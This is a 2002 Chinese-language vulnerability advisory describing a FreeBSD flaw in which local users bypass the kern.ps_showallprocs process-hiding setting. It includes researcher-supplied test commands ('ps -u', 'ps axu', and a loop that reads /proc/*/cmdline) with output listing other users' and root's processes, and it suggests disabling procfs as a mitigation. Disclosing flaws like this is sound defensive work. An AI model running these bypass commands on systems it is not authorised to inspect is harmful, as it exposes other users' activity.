发布日期：2002-05-18
更新日期：2002-05-24

受影响系统：

描述：

---

BUGTRAQ  ID: 4768

FreeBSD是一款免费开放源代码的操作系统。

FreeBSD中的隐藏进程功能存在漏洞，可导致本地攻击者查看本地系统任意进程列表。

在FreeBSD中，可通过sysctl调用设置kern.ps_showallprocs=0用来使非特权用户不能查看不属于自己进程的信息，攻击者可以通过从Procfs文件系统中获得进程列表信息，或者从指定特定选项的'ps'命令中获得进程信息。

<**>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Jakub Filonik （sirat@fremen[dot]g0ds[dot]org）提供了如下测试方法：

指定进程ID可获得进程信息：

sirat@fremen:ttyp3:~> ps -u5710
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
seeba 5710 0,0 0,0 1388 0 p6 IWsJ - 0:00,00 -tcsh (tcsh)


可查看root进程:
sirat@fremen:ttyp3:~> ps -u205
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 205 0,0 0,1 2064 264 ?? IsJ 9:23 0:00,05 /usr/sbin/sshd

ps axu可获得详细信息：
sirat@fremen:ttyp3:~> ps axu
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
sirat 40384 0,0 0,1 428 272 p3 R+J 18:53 0:00,00 ps axu
root 515 0,0 0,3 1744 600 ?? SsJ 9:26 0:19,97 screen
sirat 516 0,0 0,0 1404 0 p2 IWsJ - 0:00,00 /bin/tcsh
sirat 519 0,0 0,9 3996 1672 p2 S+J 9:26 0:51,67
/usr/local/bin/irs
sirat 588 0,0 0,5 1396 860 p0 IsJ 9:32 0:00,83 -tcsh (tcsh)
sirat 1467 0,0 0,4 1400 844 p3 SsJ 9:37 0:00,52 -tcsh (tcsh)
sirat 2183 0,0 0,0 1400 0 p5 IWs+J - 0:00,00 -tcsh (tcsh)
sirat 4491 0,0 0,1 1604 124 p1 S+J 13:59 0:00,13 screen -r
sirat 40359 0,0 0,9 2676 1660 p0 I+J 18:51 0:00,07 mutt
sirat 40365 0,0 0,2 648 448 p0 I+J 18:51 0:00,01 sh -c joe '/home/s
sirat 40366 0,0 0,5 1316 900 p0 S+J 18:51 0:00,12 joe /home/sirat/tm
sirat 467 0,0 0,0 1396 0 p1 IWsJ - 0:00,00 -tcsh (tcsh)


Yuri A. Kabaenkov （sec@artofit[dot]com）提供如下测试方法：

$ cd /proc;
$ for i in `ls`;do cat $i/cmdline;echo;done
/sbin/init--
/bin/sh/usr/local/bin/svscanboot
svscan/service
readproctitle
supervisepop3
superviselog
supervisesend
superviselog
supervisesmtp
superviselog
supervisednscache
superviselog
supervisetinydns
superviselog
superviseaxfrdns
superviselog
mysqld
/usr/local/bin/multilogt/var/log/qmail/pop3d
/usr/local/bin/tinydns
/usr/local/bin/tcpserver-D-H-R-x/home/vpopmail/etc/tcp.smtp.cdb-c25-u9002-g90010smtp/var/qmail/bin/qmail-smtpd
qmail-send
/usr/local/bin/multilogts1000000n20/var/log/qmail/send
/usr/local/bin/tcpserver-D-R-H-l00110/var/qmail/bin/qmail-popupmyhost.com/home/vpopmail/bin/vchkpw/var/qmail/bin/qmail-pop3dMaildir

...

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 如果不需要procfs文件系统，请关闭使用。

浏览次数：3759
严重程度：0（网友投票）